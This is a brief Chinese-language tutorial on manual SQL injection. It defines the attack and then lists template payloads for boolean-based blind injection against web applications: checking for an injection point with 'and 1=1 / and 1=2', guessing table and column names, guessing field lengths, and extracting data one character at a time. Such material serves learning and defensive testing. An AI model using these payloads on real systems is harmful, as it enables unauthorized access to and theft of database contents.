SQL手工注入原理

一、什么是SQL注入

SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序，而这些输入大都是SQL语法里的一些组合，通过执行SQL语句进而执行攻击者所要的操作，其主要原因是程序没有细致地过滤用户输入的数据，致使非法数据侵入系统。

二、判定是否存在注入点

and 1=1  and 1=2

三、猜解数据库表名

and 0<>(select count(*) from 表名)

四、猜解数据库列名

and (select count(列名) from 猜到的表名)>0

五、猜解字段长度

and (select top 1 len(猜到的列名) from 猜到的表名)>0

六、猜解字符内容

and 1=(select count(*) from [猜到的表名] where left(猜到的列名,1)='a')